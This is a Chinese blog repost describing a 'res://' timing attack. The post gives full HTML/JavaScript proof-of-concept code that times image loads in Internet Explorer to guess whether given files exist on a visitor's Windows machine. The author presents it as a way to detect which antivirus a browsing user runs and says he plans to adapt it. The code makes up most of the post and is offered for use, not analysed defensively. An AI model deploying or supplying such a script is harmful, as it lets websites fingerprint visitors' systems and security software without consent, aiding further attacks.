Res Timing Attack -- 利用客户端js脚本探测客户端主机某文件是否存在

lionzl

于 2012-02-13 08:57:06 发布

阅读量680

点赞数

分类专栏：计算机安全文章标签：脚本 windows system file function 杀毒软件

计算机安全专栏收录该内容

260 篇文章 8 订阅

订阅专栏

Res Timing Attack -- 利用客户端js脚本探测客户端主机某文件是否存在

2009-05-27 23:32

一个很有趣的应用。试想当用户浏览网页时，我们就可以利用js判断他安装了什么杀毒软件，有点意思，呵呵。从网上看到了一个PoC，过几天自己修改修改，整合利用一下。

客户端js脚本利用res协议对系统存在的文件和不存在的文件加载时间的差异来估算文件是否存在。

--------------------------------------------------------------------------------------------------------------------------------

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<BODY>

<SCRIPT>
var goodTime = 0;
var badTime = 0;
var good = ["c:\\windows\\system32\\telnet.exe",
     "c:\\windows\\system32\\msimsg.dll",
     "c:\\windows\\system32\\xcopy.exe",
     "c:\\windows\\system32\\wuauserv.dll"];

var bad = ["c:\\windows\\system32\\asdf.dll",
     "c:\\windows\\system32\\1234.dll",
     "c:\\windows\\system32\\asdf.exe",
     "c:\\windows\\system32\\1234.exe"];
calibrateGood(0);

function calibrateGood (index)
{
if (index < 4)
{
   goodTime += time(good[index], 1);
   setTimeout ("calibrateGood(" + (index + 1) + ")", 500);
   return;
}
goodTime = goodTime / 4;
setTimeout ("calibrateBad(0)", 0);
}


function calibrateBad (index)
{
if (index < 4)
{
   badTime += time(bad[index], 1);
   setTimeout ("calibrateBad(" + (index + 1) + ")", 500);
   return;
}
badTime = badTime / 4;
log("<br>Average good time is " + goodTime + "ms<br>Average bad time is " + badTime + "ms<br>");
setTimeout ("promptUser()", 0);
}

function promptUser()
{
while (1)
{
   var file = window.prompt("Enter file name to test.", '');
   if (file == '' || ! file )
   {return;}

   var result = time(file);
   if (Math.abs(badTime - result) < Math.abs(goodTime - result))
   {
    log(file + " doesn't appear to exist - " + result + "ms");
   }
   else
   {
    log(file + " appears to exist - " + result + "ms");
   }
}
}

function time(file, debug)
{
var url = "res://" + file + "/#2/#";
var test = new Image();
var d = new Date();
//alert();
for (var loop = 0; loop < 1000; loop++)
{
test.src = url + (loop + 1000);
//alert('');
}
var d2 = new Date();
var time = d2.getTime() - d.getTime();
if (debug) {log(file + " - " + time);}
// alert(time);
return time;

}

function log(data)
{
var text;
text = document.createElement('div');
text.innerHTML = data + "<br>";
document.body.appendChild(text);
}

</SCRIPT>
</BODY></HTML>

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Res Timing Attack -- 利用客户端js脚本探测客户端主机某文件是否存在

Res Timing Attack -- 利用客户端js脚本探测客户端主机某文件是否存在2009-05-27 23:32一个很有趣的应用。试想当用户浏览网页时，我们就可以利用js判断他安装了什么杀毒软件，有点意思，呵呵。从网上看到了一个PoC，过几天自己修改修改，整合利用一下。客户端js脚本利用res协议对系统存在的文件和不存在的文件加载时间的差异来估算文件是否存在。------
复制链接

扫一扫

专栏目录

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。